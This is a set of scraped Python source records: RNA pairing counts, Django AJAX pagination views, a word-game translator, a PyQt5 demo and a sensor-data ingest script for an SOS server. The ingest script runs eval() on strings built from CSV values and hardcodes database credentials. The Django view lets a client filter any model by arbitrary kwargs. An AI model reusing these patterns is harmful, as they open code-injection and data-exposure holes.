range(len(inArray[:,0])-1):\n\t\tif(inArray[:,0][j+1]-inArray[:,0][j]) != 1:\n\t\t\tprint(\"Something went wrong\")\n\n\tprint(i)\t\n\ti+=1\n\t\n","sub_path":"scripts/testifvelocitiesarecorrect.py","file_name":"testifvelocitiesarecorrect.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"141264578","text":"def uncrossing(string):\n sum = 0\n dict1 = {'A': 1, 'C': 2, 'G': -2, 'U': -1}\n for i in string:\n sum += dict1[i]\n return sum\n\ndef mapping(string,dic):\n dict2 = {'A': 'U', 'C': 'G', 'G':'C', 'U': 'A'}\n list = []\n if len(string) <= 2:\n return 1\n elif string in dic:\n return dic[string]\n\n for i in range(len(string)):\n if dict2[string[0]] == string[i] and uncrossing(string[0:i + 1]) == 0:\n list.append(i)\n sum = 0\n for i in list:\n if mapping(string[1:i], dic) != None and mapping(string[i+1: len(string)], dic) != None:\n sum += mapping(string[1:i], dic) * mapping(string[i+1: len(string)], dic)\n dic[string] = sum\n return dic\n\n\nif __name__ == '__main__':\n string_s = 'CUUCCGUGCACGCUUCCGGAUAAUUCGACGCGACGUCGACGGGCAGCUCGCGCAUGAAUUGUUAGCCGGCCAUGAUAAUUAUAGCACUAUAUAUAUAACCGGCGUGGUGCUAACGCUGCAGCAAGAUAUCCCGAAUUGCUAGGAUCGCUUUGAUCAACGGGGCCGCGGGGGCCAUGGCGCCCUUAACCAAAUAGCUUUAAUUGUAGCCCGACCGCGGUAGCUCGGCGUACCAUGCAUGGCAUUA'\n dic = {}\n print(sorted(mapping(string_s,dic).values())[-1]%1000000)\n\n","sub_path":"CAT_CatalanNumbers.py","file_name":"CAT_CatalanNumbers.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"449854394","text":"from functools import reduce\nimport json\n\nimport django.apps\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models.base import ModelBase\nfrom django.db.models.query import QuerySet\nfrom django.http import JsonResponse, HttpResponseNotAllowed\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.views.generic.base import View, ContextMixin, TemplateResponseMixin\n\n\nclass Pagination(TemplateResponseMixin, ContextMixin, View):\n model = None\n order = []\n paginate_by = 4\n object_name = 'items'\n object_list = []\n\n @classmethod\n def get_parents(cls):\n return [x.__name__ for x in cls.__bases__]\n\n def dispatch(self, request, *args, **kwargs):\n if 'ListView' in self.get_parents():\n self.object_list = self.get_queryset()[:self.paginate_by]\n else:\n self.object_list = self.get_qs()[:self.paginate_by]\n return super(Pagination, self).dispatch(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n return self.render_to_response(context)\n\n def get_qs(self):\n qs = None\n return qs\n\n def get_context_data(self, **kwargs):\n context = super(Pagination, self).get_context_data(**kwargs)\n model_fields = self.model._meta.fields\n if len(self.order):\n f_dict = {i: j.name for i, j in enumerate(model_fields)}\n fields = ','.join(list(dict(sorted(f_dict.items(), key=lambda x: self.order.index(x[1]))).values()))\n else:\n fields = ','.join(i.name for i in model_fields)\n context['fields'] = fields\n context['model'] = self.model.__name__\n context['paginate_by'] = self.paginate_by\n context[self.object_name] = self.object_list\n return context\n\n\nclass GetPaginationItems(View):\n def __init__(self):\n super().__init__()\n z = django.apps.apps.get_models(include_auto_created=False)\n self.models = {x.__name__: x for x in z}\n self.additional_field_keys = []\n\n def gather_items(self, model, additional_qs, lst):\n v = []\n for g in lst:\n if isinstance(g[1].__class__, ModelBase):\n if g[1]._meta.concrete_model.__name__ != model:\n v.append(dict(\n [(f'{additional_qs}.{g[0]}.{k.name}', getattr(g[1], k.name))\n for k in g[1]._meta.fields if k.is_relation is False]))\n else:\n v.append({f'{additional_qs}.{g[0]}': g[1]})\n for f in list(reduce(lambda x, y: x + y, [list(x.keys()) for x in v])):\n if f not in self.additional_field_keys:\n self.additional_field_keys.append(f)\n return v\n\n def get(self, request):\n return HttpResponseNotAllowed(['XHR'])\n\n def post(self, request):\n if request.is_ajax():\n res = []\n filter_kwargs = json.loads(request.POST['filter'])\n step = int(request.POST['step'])\n next_step = int(request.POST['next_step'])\n additional = json.loads(request.POST['additional'])\n named = json.loads(request.POST['named'])\n model = request.POST['pagination_model']\n items = self.models[model].objects.filter(**filter_kwargs).order_by('id')[step:next_step]\n\n for i in items:\n z = {}\n if bool(int(request.POST['nested'])) is False:\n z.update({x.name: getattr(i, x.name) for x in i._meta.fields if x.is_relation is False})\n res.append(z)\n else:\n for x in i._meta.fields:\n if x.is_relation is False:\n z.update({x.name: getattr(i, x.name)})\n else:\n field_keys = [i for i in x.related_model._meta.fields if i.is_relation is False]\n try:\n rel = x.related_model.objects.get(id=getattr(i, f'{x.name}_id'))\n except ObjectDoesNotExist:\n\n rel = [None for x in range(len(\n field_keys))]\n if not isinstance(rel, list):\n if bool(int(named)) is False:\n z.update(\n {x.name: [getattr(rel, k.name) for k in rel._meta.fields if\n k.is_relation is False]})\n else:\n f = [k.name for k in rel._meta.fields if k.is_relation is False]\n z.update({x.name: [{f'{x.name}.{i}': getattr(rel, i)} for i in f]})\n z[x.name].append({'field_keys': [f'{x.name}.{k}' for k in f]})\n else:\n z.update({x.name: rel})\n z[x.name].append({'field_keys': [f'{x.name}.{h.name}' for h in field_keys]})\n\n if len(additional):\n for a in additional:\n if 'qs' in a:\n additional_qs = a['qs']\n filter_kwargs = {}\n if 'method' not in a:\n additional_method = 'all'\n else:\n additional_method = a['method']\n if 'filter_kwargs' in a:\n filter_kwargs.update(a['filter_kwargs'])\n try:\n qs = getattr(getattr(i, additional_qs), additional_method)(**filter_kwargs)\n if isinstance(qs, QuerySet) and len(qs):\n b = []\n for q in qs:\n lst = [(x.name, getattr(q, x.name)) for x in q._meta.fields]\n v = self.gather_items(model, additional_qs, lst)\n b.append(v)\n z.update({additional_qs: b, 'additional_field_keys': self.additional_field_keys})\n else:\n z.update({additional_qs: None, 'field_keys': []})\n if not isinstance(qs, QuerySet) and qs is not None:\n b = []\n fields = [x.name for x in qs._meta.fields]\n lst = [(f, getattr(qs, f)) for f in fields]\n v = self.gather_items(model, additional_qs, lst)\n b.append(v)\n z.update({additional_qs: b, 'additional_field_keys': self.additional_field_keys})\n\n except Exception as e:\n data = {'error': str(e)}\n return JsonResponse(data, encoder=DjangoJSONEncoder)\n res.append(z)\n data = {'items': res}\n return JsonResponse(data, encoder=DjangoJSONEncoder)\n else:\n return HttpResponseNotAllowed(['XHR'])\n","sub_path":"apps/tw_pagination/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"611297188","text":"\"\"\"5. Write a function translate() that will translate a text into \"rövarspråket\" \n(Swedish for \"robber's language\"). That is, double every consonant\nand place an occurrence of \"o\" in between. For example, translate(\"this is fun\") \nshould return the string \"tothohisos isos fofunon\".\"\"\"\n\n\ndef translate(text):\n consonants = list(\"bcdfghjklmnpqrstvexz\")\n translated = []\n for char in text:\n if char in consonants:\n char = char + 'o' + char\n translated += char\n else:\n translated += char\n\n return ''.join(translated)\n\n\ndef main():\n print(translate(\"this is fun\"))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287685625","text":"# 在test.py中进行逻辑��码构写\n\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget\nfrom designer import Ui_Form\n\nclass Demo(QWidget,Ui_Form):\n def __init__(self):\n super(Demo,self).__init__()\n self.setupUi(self)\n self.text_edit.textChanged.connect(self.show_text_func)\n\n def show_text_func(self):\n self.text_browser.setText(self.text_edit.toPlainText())\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n demo = Demo()\n demo.show()\n sys.exit(app.exec_())","sub_path":"pyQt5/第十四章 快速制作界面——Qt Designer/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"459795312","text":"#Imports\r\nfrom datetime import datetime\r\nfrom glob import glob\r\nimport argparse\r\nimport csv\r\nimport dateutil.parser\r\nimport json\r\nimport logging\r\nimport os\r\nimport records\r\nimport urllib.request as ur\r\nimport urllib.parse\r\nimport xml.etree.ElementTree as ET\r\n\r\n#Global variables\r\nCSVCHUNKSIZE = 1000\r\nconnstring = 'postgres://sos:sensors@ingest_data:5432/ingest'\r\ndb = records.Database(connstring)\r\nurl = None\r\nstation_meta_template=\"templates/station_template.txt\"\r\nsensor_meta_template=\"templates/sensor_template.txt\"\r\nresult_meta_template=\"templates/result_template.txt\"\r\ndata_template=\"templates/data_template.txt\"\r\n\r\nmetadata_headers=[\r\n 'stationid',\r\n 'shortName',\r\n 'longName',\r\n 'easting',\r\n 'northing',\r\n 'altitude',\r\n 'organizationName',\r\n 'organizationURL',\r\n 'contact',\r\n 'waterbodyType',\r\n 'urn-org',\r\n 'suborg']\r\n\r\nparameter_headers=[\r\n 'parameter',\r\n 'parameterName',\r\n 'parameterUnit',\r\n 'fieldName',\r\n 'status']\r\n\r\nofferkey = [\r\n ['id', \"./ns5:identifier\", 1],\r\n ['name',\"./ns5:name\", 1],\r\n ['procedure',\"./ns5:procedure\",1],\r\n ['proc_fmt',\"./ns5:procedureDescriptionFormat\",5],\r\n ['obsprop',\"./ns5:observableProperty\",5],\r\n ['respfmt',\"./ns0:responseFormat\",7],\r\n ['obstype',\"./ns0:observationType\",1],\r\n ['featureofinttype',\"./ns0:featureOfInterestType\",1],\r\n ['phenombegin',\"./ns0:phenomenonTime/ns6:TimePeriod/ns6:beginPosition\",1],\r\n ['phenomend',\"./ns0:phenomenonTime/ns6:TimePeriod/ns6:endPosition\",1],\r\n ['resultbegin',\"./ns0:resultTime/ns6:TimePeriod/ns6:beginPosition\",1],\r\n ['resultend',\"./ns0:resultTime/ns6:TimePeriod/ns6:endPosition\",1]]\r\n\r\nnamespaces = {\r\n 'ns0':\"http://www.opengis.net/sos/2.0\",\r\n 'ns2':\"http://www.opengis.net/ows/1.1\",\r\n 'ns3':\"http://www.w3.org/1999/xlink\",\r\n 'ns4':\"http://www.opengis.net/fes/2.0\",\r\n 'ns5':\"http://www.opengis.net/swes/2.0\",\r\n 'ns6':\"http://www.opengis.net/gml/3.2\",\r\n 'xsi':\"http://www.w3.org/2001/XMLSchema-instance\",\r\n 'gda':\"http://www.opengis.net/sosgda/1.0\",\r\n 'gml':\"http://www.opengis.net/gml/3.2\"}\r\n\r\n#Functions\r\ndef create_offer_dict(noff):\r\n off_d = {}\r\n for field in offerkey:\r\n for i in range(field[2]):\r\n off_d[field[0]] = [j.text for j in noff.findall(field[1],namespaces)]\r\n return off_d\r\n\r\ndef parse_capabilities(url):\r\n r = ur.urlopen(url + \"?service=SOS&request=GetCapabilities\")\r\n tree = ET.parse(r)\r\n with open('debug/capabilities.xml','wb') as of:\r\n tree.write(of)\r\n root = tree.getroot()\r\n offerings_l = root.findall('./ns0:contents/ns0:Contents/ns5:offering/ns0:ObservationOffering',namespaces)\r\n offer_list = []\r\n for noffer in offerings_l:\r\n offer_dict = create_offer_dict(noffer)\r\n offer_list.append(offer_dict)\r\n return offer_list\r\n\r\ndef pull_capability_data(offer_list):\r\n with open('debug/offer.csv','w') as fo:\r\n fo.write(\"id,org,suborg,stationid,status,parameter,phenombegin,phenomend,resbegin,resend\\n\")\r\n unique_offers = []\r\n for i in offer_list:\r\n try:\r\n resbegin = i['resultbegin'][0]\r\n except IndexError:\r\n resbegin = \"\"\r\n try:\r\n resend = i['resultend'][0]\r\n except IndexError:\r\n resend = \"\"\r\n try:\r\n phenombegin = i['phenombegin'][0]\r\n except IndexError:\r\n phenombegin = \"\"\r\n try:\r\n phenomend = i['phenomend'][0]\r\n except IndexError:\r\n phenomend = \"\"\r\n nid = i['id'][0]\r\n nid_sp = nid.split(\":\")\r\n org=nid_sp[3]\r\n suborg=nid_sp[4]\r\n stationid=nid_sp[5]\r\n status=nid_sp[6]\r\n try:\r\n parameter=nid_sp[7]\r\n except IndexError:\r\n parameter=\"\"\r\n fo.write(\"{},{},{},{},{},{},{},{},{},{}\\n\".format(\r\n nid,org,suborg,stationid,status,parameter,phenombegin,phenomend,resbegin,resend))\r\n try:\r\n unique_offers.append((stationid,parameter,status,dateutil.parser.parse(phenomend,default=datetime(1950,1,1))))\r\n except ValueError:\r\n unique_offers.append((stationid,parameter,status,datetime(1950,1,1).isoformat()))\r\n return unique_offers\r\n\r\ndef get_url(sensor_id):\r\n global url\r\n if url == None:\r\n rows = db.query('''\r\n select o.sos_url from sensors s, organizations o\r\n where s.organization_id = o.organization_id\r\n and sensor_id = :id''', id=sensor_id)\r\n url = rows[0].sos_url\r\n\r\ndef get_data(sensor_id):\r\n q = db.query('select org_sensor_id, data_url from sensors where sensor_id = :id', id=sensor_id)\r\n url = q[0].data_url\r\n r = urllib.request.urlopen(url)\r\n open(\"data/{}.csv\".format(sensor_id), 'wb').write(r.read())\r\n org_sensor_id = q[0].org_sensor_id\r\n return org_sensor_id\r\n\r\ndef qa_rules(sensor_id):\r\n qa = []\r\n q = db.query('select * from all_sensor_quality_checks where sensor_id = :id', id=sensor_id)\r\n for r in q:\r\n qa.append(r.as_dict())\r\n return qa\r\n\r\ndef is_qa_applied(sensor_id):\r\n q = db.query('select qc_rules_apply from sensors where sensor_id = :id', id=sensor_id)\r\n return q[0].qc_rules_apply\r\n\r\ndef get_header(sensor_id):\r\n fieldnames = None\r\n with open('data/' + str(sensor_id) + '.csv') as csvfile:\r\n f = csv.DictReader(csvfile)\r\n fieldnames = f.fieldnames\r\n return fieldnames\r\n\r\ndef write_config(sensor_id, org_sensor_id, fields):\r\n json = '{\"type\":1,\"columns\":['\r\n for n in fields:\r\n json = json + '\"' + n + '\",'\r\n json = json[:-1] + '],\"station\":\"' + org_sensor_id + '\",\"header\":1}'\r\n open('config/' + str(sensor_id) + '.json', 'w').write(json)\r\n\r\ndef get_station_metadata(sensor_id):\r\n station = db.query('''\r\n select stationid, \"shortName\", \"longName\", easting, northing, altitude,\r\n \"organizationName\", \"organizationURL\",\r\n\tcontact, \"waterbodyType\", \"urn-org\", suborg\r\n from sos.all_sensors s where sensor_id = :id''', id=sensor_id)\r\n return station.as_dict()\r\n\r\ndef get_parameter_metadata(sensor_id, fields):\r\n params = []\r\n parameter = db.query('''\r\n select parameter_name, unit_name, parameter_column_id,\r\n lower(data_qualifier_name) as status from all_sensor_parameters where sensor_id = :id''', id=sensor_id)\r\n for r in parameter:\r\n d = {'parameter':r.parameter_name,'parameterName':r.parameter_name,'parameterUnit':r.unit_name,'fieldName':fields[r.parameter_column_id - 1],'status':r.status}\r\n params.append(d.copy())\r\n return params\r\n\r\ndef create_station_request(template, stationmeta, parammeta):\r\n \"\"\"\r\n Purpose: Create the text of the xml for a station/sensor\r\n Input: station meta data (as list of dictionaries)\r\n Output: text file used for station push\r\n \"\"\"\r\n lookup={\r\n #'Sequence':stationmeta['Sequence'].lower(),\r\n 'suborg':stationmeta['suborg'].lower(),\r\n 'stationid':stationmeta['stationid'].lower(),\r\n 'shortName':stationmeta['shortName'].lower(),\r\n 'longName':stationmeta['longName'],\r\n 'easting':stationmeta['easting'].lower(),\r\n 'northing':stationmeta['northing'].lower(),\r\n 'altitude':stationmeta['altitude'].lower(),\r\n 'parameter':parammeta['fieldName'].lower(),\r\n 'parameterName':parammeta['parameterName'],\r\n 'parameterUnit':parammeta['parameterUnit'],\r\n 'fieldName':parammeta['fieldName'],\r\n 'organizationName':stationmeta['organizationName'],\r\n 'organizationURL':stationmeta['organizationURL'],\r\n 'contact':stationmeta['contact'],\r\n 'waterbodyType':stationmeta['waterbodyType'],\r\n 'publisher':stationmeta['urn-org'].lower(),\r\n 'status':parammeta['status'].lower(),\r\n 'urn-org':stationmeta['urn-org'].lower()}\r\n #open the station template file and read the template as a string\r\n with open(template,'r') as fi:\r\n station_meta_str = fi.read()\r\n\r\n #the template is coded with lookups for the KEYS from each list element in stationmeta.\r\n #Create the lookup dictionary for the template LookupError\r\n #lookup = {k:stationmeta[k].lower() for k in metadata_headers}\r\n\r\n #replace the placeholders with corresponding information from the metadata\r\n new_station_meta_str = station_meta_str.format(**lookup)\r\n return new_station_meta_str\r\n\r\ndef push_template(station_str, url):\r\n \"\"\"\r\n Purpose: Push station or sensor to server\r\n Input: Station xml, url\r\n Output: None\r\n \"\"\"\r\n station_bytes = station_str.encode('utf-8')\r\n req = ur.Request(url)\r\n req.add_header('Content-Type','application/xml')\r\n req.add_header('charset','UTF-8')\r\n r = ur.urlopen(req,data=station_bytes)\r\n return r\r\n\r\ndef check_data(data_file,unique_offers,station_status):\r\n last_record = []\r\n station_list = [s[0] for s in unique_offers]\r\n station_match_flag = False\r\n station_sensor_flag = False\r\n\r\n with open(data_file,'r') as fr:\r\n r = csv.reader(fr)\r\n for i, row in enumerate(r):\r\n if i == 0:\r\n continue #skip header row\r\n else:\r\n station = row[0]\r\n parameter = row[3]\r\n #logging.debug(\"{} - Station: {} Parameter {}\".format(i,station,parameter))\r\n #check if station is in offering\r\n #stops when it finds a match, because offering should be unique\r\n if station in station_list:\r\n append_value = (\"sensor\",(station,parameter))\r\n for st, par, status, date in unique_offers:\r\n if station == st:\r\n if parameter == par:\r\n if status == station_status:\r\n append_value = (\"ok\",date)\r\n break\r\n else:\r\n append_value = (\"station_sensor\",(station,parameter))\r\n last_record.append(append_value)\r\n return last_record\r\n\r\ndef get_unique_station_sensor(data_file,date_filter):\r\n \"\"\"\r\n Input: data_file:csv file\r\n Output:\r\n \"\"\"\r\n with open(data_file,'r') as fi:\r\n r = csv.reader(fi)\r\n # new_csv_list=[]\r\n # new_csv_list.append([\"StationID\", \"Parameter\",\"NumberOfObs\",\"TimeObsString\"])\r\n station_sensor_list = []\r\n for i, row in enumerate(r):\r\n #Do we want to process it?\r\n if i == 0:\r\n continue\r\n else:\r\n j = i-1\r\n stationid = row[0]\r\n parameter = row[3]\r\n if not date_filter[j]:\r\n continue #or do something with it\r\n else:\r\n station_sensor_list.append((stationid,parameter))\r\n unique_station_sensor = set(station_sensor_list)\r\n return unique_station_sensor\r\n\r\ndef check_dates(data_file,last_record):\r\n date_filter=[]\r\n with open(data_file,'r') as fi:\r\n r = csv.reader(fi)\r\n for i, row in enumerate(r):\r\n #index offset 1 for last_record list\r\n j = i-1\r\n if i == 0:\r\n continue\r\n elif last_record[j][0] != 'ok':\r\n date_filter.append(True)\r\n else:\r\n date=row[1]\r\n time=row[2]\r\n date_time = dateutil.parser.parse(\"{} {}\".format(date,time))\r\n #process the date filter\r\n if date_time > last_record[j][1]:\r\n date_filter.append(True)\r\n else:\r\n date_filter.append(False)\r\n\r\n return date_filter\r\n\r\ndef accumulate_data(unique_station_sensor,data,date_filter):\r\n rolled_up_data = {}\r\n last_date = None\r\n with open(data,'r') as fi:\r\n r = csv.reader(fi)\r\n for i, row in enumerate(r):\r\n j = i-1\r\n if i == 0:\r\n continue\r\n else:\r\n if date_filter[j] and row[4] != \"\": #only process row if date_filter is true and value is not missing\r\n data_id = (row[0],row[3]) #(stationid,parameter)\r\n date_time = dateutil.parser.parse(\"{} {}\".format(row[1],row[2]))\r\n data_value = (datetime.isoformat(date_time),row[4])\r\n if last_date != date_time:\r\n last_date = date_time\r\n rolled_up_data.setdefault(data_id, {}).setdefault('values',[]).append(data_value)\r\n for k,v in rolled_up_data.items():\r\n count = len(v['values'])\r\n rolled_up_data[k]['count']=count\r\n return rolled_up_data\r\n\r\ndef create_data_request(data_template, k,v,status,urnorg,suborg):\r\n stationid = k[0]\r\n parameter = k[1]\r\n count = str(v['count'])\r\n values_str = \"\"\r\n for item in v['values']:\r\n values_str += item[0]\r\n values_str +=\",\"\r\n values_str += item[1]\r\n values_str += \";\"\r\n data = count + \";\" + values_str\r\n\r\n\r\n with open(data_template,'r') as fi:\r\n data_meta_str = fi.read()\r\n #replace the placeholders with corresponding information from the metadata\r\n new_data_meta_str = data_meta_str.format(\r\n stationid=stationid,\r\n parameter=parameter,\r\n status=status,\r\n suborg=suborg,\r\n urnorg=urnorg,\r\n data=data)\r\n return new_data_meta_str\r\n\r\ndef push_new_templates(data,last_record,date_filter,stationmeta,parammeta):\r\n alreadyprocessed = []\r\n with open(data,'r') as fi:\r\n for i,row in enumerate(fi):\r\n j = i-1\r\n if i == 0:\r\n continue\r\n elif not date_filter[j]:\r\n continue #skip data that is already in the database (OR DO SOMETHING WITH IT?)\r\n elif last_record[j] in alreadyprocessed:\r\n continue\r\n else:\r\n #check templates that need to be uploaded\r\n status = last_record[j][0]\r\n if status == 'station_sensor':\r\n # Get pertinent info\r\n station = last_record[j][1][0]\r\n parameter = last_record[j][1][1]\r\n station_record = None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n station_record = record\r\n break\r\n if station_record == None: \r\n continue #OR DO SOMETHING else\r\n #Create STATION template\r\n station_str = create_station_request(station_meta_template,station_record,parammeta[0])\r\n response = push_template(station_str, url)\r\n #logger.debug(\"Station {} template pushed with response {}\".format(station,response.readlines()))\r\n # PROCESS SENSOR TEMPLATE\r\n sensor_record = None\r\n sensor_param_record=None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n sensor_record = record\r\n break\r\n for record in parammeta:\r\n if record['fieldName'] == parameter:\r\n sensor_param_record = record\r\n break\r\n if sensor_record == None:\r\n continue #OR DO SOMETHING else\r\n if sensor_param_record == None:\r\n continue\r\n #Create sensor str\r\n sensor_str = create_station_request(sensor_meta_template,sensor_record,sensor_param_record)\r\n response = push_template(sensor_str, url)\r\n #logging.debug(\"Sensor {} template pushed with response {}\".format(parameter, response.readlines()))\r\n # PROCESS RECORD TEMPLATE\r\n result_record = None\r\n result_param_record=None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n result_record = record\r\n break\r\n for record in parammeta:\r\n if record['fieldName'] == parameter:\r\n result_param_record = record\r\n break\r\n if result_record == None:\r\n continue #OR DO SOMETHING else\r\n if result_param_record == None:\r\n continue\r\n #Create sensor str\r\n result_str = create_station_request(result_meta_template,result_record,result_param_record)\r\n response = push_template(result_str, url)\r\n #logging.debug(\"Result {} {} template pushed with response {}\".format(station, parameter,response.readlines()))\r\n alreadyprocessed.append(last_record[j])\r\n elif status == 'sensor':\r\n station = last_record[j][1][0]\r\n parameter = last_record[j][1][1]\r\n #lookup station parameter in metadata_headers\r\n # PROCESS SENSOR TEMPLATE\r\n sensor_record = None\r\n sensor_param_record=None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n sensor_record = record\r\n break\r\n for record in parammeta: \r\n if record['fieldName'] == parameter:\r\n sensor_param_record = record\r\n break\r\n if sensor_record == None: \r\n continue #OR DO SOMETHING else\r\n if sensor_param_record == None:\r\n continue\r\n #Create sensor str\r\n sensor_str = create_station_request(sensor_meta_template,sensor_record,sensor_param_record)\r\n response = push_template(sensor_str, url)\r\n #logging.debug(\"Sensor {} template pushed with response {}\".format(parameter, response.readlines()))\r\n # PROCESS RECORD TEMPLATE\r\n result_record = None\r\n result_param_record=None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n result_record = record\r\n break\r\n for record in parammeta:\r\n if record['fieldName'] == parameter:\r\n result_param_record = record\r\n break\r\n if result_record == None:\r\n continue #OR DO SOMETHING else\r\n if result_param_record == None:\r\n continue\r\n #Create sensor str\r\n result_str = create_station_request(result_meta_template,result_record,result_param_record)\r\n response = push_template(result_str, url)\r\n #logging.debug(\"Result {} {} template pushed with response {}\".format(station, parameter, response.readlines()))\r\n alreadyprocessed.append(last_record[j])\r\n\r\ndef chunk(sensorid,alldatafile):\r\n with open(alldatafile,'r') as fi:\r\n num_lines = sum(1 for line in fi)\r\n if num_lines <= 1:\r\n logging.error(\"No data to ingest for sensor Id:{}\".format(sensorid))\r\n exit()\r\n fi.seek(0)\r\n r = csv.reader(fi)\r\n filecount = 0\r\n counter = 1 #account for header\r\n eof = False\r\n next(fi)\r\n while eof == False:\r\n filecount += 1\r\n filename = \"{}.{}\".format(alldatafile, filecount)\r\n with open(filename,'w',newline=\"\") as fo:\r\n w = csv.writer(fo)\r\n w.writerow([\"station\",\"date\",\"time\",\"parameter\",\"value\"])\r\n for i,line in enumerate(r):\r\n counter += 1\r\n w.writerow(line)\r\n if counter == num_lines:\r\n eof = True\r\n if counter % CSVCHUNKSIZE == 0:\r\n break\r\n \r\ndef pivot(sensorid,qa):\r\n conf_file='config/{}.json'.format(sensorid)\r\n data_file='data/{}.csv'.format(sensorid)\r\n if qa != None:\r\n logging.debug(\"QA Applied for sensor Id:{}\".format(sensorid))\r\n alldatafile=\"data/{}.qa.csv\".format(sensorid)\r\n else:\r\n alldatafile=\"data/{}.raw.csv\".format(sensorid)\r\n \r\n with open(conf_file,'r') as fi:\r\n conf_str = fi.read()\r\n config = json.loads(conf_str)\r\n \r\n with open(data_file,'r') as fi:\r\n with open(alldatafile,'w', newline=\"\") as fo:\r\n r = csv.reader(fi)\r\n w = csv.writer(fo)\r\n w.writerow([\"station\",\"date\",\"time\",\"parameter\",\"value\"])\r\n columns = config['columns']\r\n station = config['station']\r\n datetimecol = columns.index(\"datetime\")\r\n header = config['header']\r\n\r\n for i,ncol in enumerate(columns):\r\n if ncol == \"datetime\":\r\n continue\r\n elif ncol == \"id\":\r\n continue\r\n else:\r\n for j,nrow in enumerate(r):\r\n if j < header:\r\n continue\r\n else:\r\n newrow = []\r\n dateX, timeX = nrow[datetimecol].split(' ',1)\r\n newrow.append(station) #station\r\n newrow.append(dateX) #date\r\n newrow.append(timeX) #time\r\n newrow.append(ncol) #parameter\r\n discard=False\r\n if qa != None:\r\n for q in qa:\r\n if q[\"parameter_column_id\"] == i+1:\r\n if eval(nrow[i] + q[\"quality_check_operand_name\"]+str(q[\"threshold\"])):\r\n logging.debug(\"Discarding sensor id {} value {} for {}\".format(sensorid, nrow[i],ncol))\r\n discard=True\r\n if discard == False:\r\n newrow.append(nrow[i])\r\n w.writerow(newrow)\r\n fi.seek(0)\r\n chunk(sensorid,alldatafile)\r\n\r\ndef update_status(sensorid, status):\r\n if status == 'complete':\r\n db.query(\"update sensors set ingest_status = 'ingested' where sensor_id = :id\", id=sensorid)\r\n if status == 'error':\r\n db.query(\"update sensors set ingest_status = :st where sensor_id = :id\", st=status, id=sensorid)\r\n if status == 'ingested':\r\n db.query(\"update sensors set ingest_status = :st, last_ingest = now(), next_ingest = now() + (20 * interval '1 minute') where sensor_id = :id\", st = status, id=sensorid)\r\n\r\ndef submit(filelist, parammeta, stationmeta, unique_offers, station_status):\r\n total_files = len(filelist)\r\n new_records = 0\r\n for i,nfile in enumerate(filelist):\r\n #logging.debug(\"Processing file {} of {}\".format(i+1,total_files))\r\n # Check data for missing templates\r\n #loop through the data file and determine what has to be done for each data point\r\n last_record = check_data(nfile,unique_offers,station_status) \r\n #create a list of which dates are before the offering date\r\n date_filter = check_dates(nfile, last_record) # could clean this up a bit\r\n #push any new templates that are needed\r\n push_new_templates(nfile,last_record,date_filter,stationmeta,parammeta)\r\n #process data, format data and push\r\n unique_station_sensor = get_unique_station_sensor(nfile,date_filter)\r\n #logging.debug('unique_station_sensor:{}'.format(unique_station_sensor))\r\n rolled_up_data = accumulate_data(unique_station_sensor,nfile,date_filter)\r\n new_records = new_records + len(rolled_up_data)\r\n if len(rolled_up_data) == 0:\r\n logging.debug('No NEW data to ingest')\r\n for k,v in rolled_up_data.items():\r\n for i in parammeta:\r\n if k[1] == i['fieldName']:\r\n status = i['status'].lower()\r\n break\r\n for i in stationmeta:\r\n if k[0] == i['stationid']:\r\n urnorg = i['urn-org'].lower()\r\n suborg = i['suborg'].lower()\r\n break\r\n data_meta_str = create_data_request(data_template, k,v,status,urnorg,suborg)\r\n response = push_template(data_meta_str,url)\r\n #logging.debug(\"-\",\"Results for {} pushed with response {}\".format(k,response.readlines()))\r\n return new_records\r\n\r\ndef remove_old_files(sensorid):\r\n filelist = glob(\"data/{}.*\".format(sensorid))\r\n for nfile in filelist:\r\n os.remove(nfile)\r\n \r\ndef process(sensorid):\r\n logging.debug(\"Ingesting Sensor Id: {}\".format(sensorid))\r\n update_status(sensorid,'running')\r\n get_url(sensorid)\r\n remove_old_files(sensorid)\r\n station = get_data(sensorid)\r\n #TODO:only if already doesn't exist\r\n write_config(sensorid, station, get_header(sensorid))\r\n\r\n #Request offering from server. Parse into a list of offerings.\r\n offer_dict = parse_capabilities(url)\r\n\r\n #Create a list of unique offerings (station, parameter, last measurement date/time)\r\n unique_offers = pull_capability_data(offer_dict)\r\n\r\n #Read station metadata csv file\r\n stationmeta = get_station_metadata(sensorid)\r\n\r\n #Read parameter metadata csv file\r\n parammeta = get_parameter_metadata(sensorid, get_header(sensorid))\r\n\r\n #Process original data\r\n pivot(sensorid, None)\r\n filelist = glob(\"data/{}.raw.csv.*\".format(sensorid))\r\n new_records = submit(filelist, parammeta, stationmeta, unique_offers, parammeta[0][\"status\"])\r\n\r\n if is_qa_applied(sensorid):\r\n prelimparammeta = parammeta\r\n for param in prelimparammeta:\r\n param[\"status\"] = \"preliminary\"\r\n pivot(sensorid, qa_rules(sensorid))\r\n prelimfilelist = glob(\"data/{}.qa.csv.*\".format(sensorid))\r\n submit(prelimfilelist, prelimparammeta, stationmeta, unique_offers, \"preliminary\")\r\n logging.debug('{} records ingested for {}'.format(new_records,sensorid))\r\n if new_records > 0:\r\n update_status(args.sensorid, 'ingested')\r\n else:\r\n 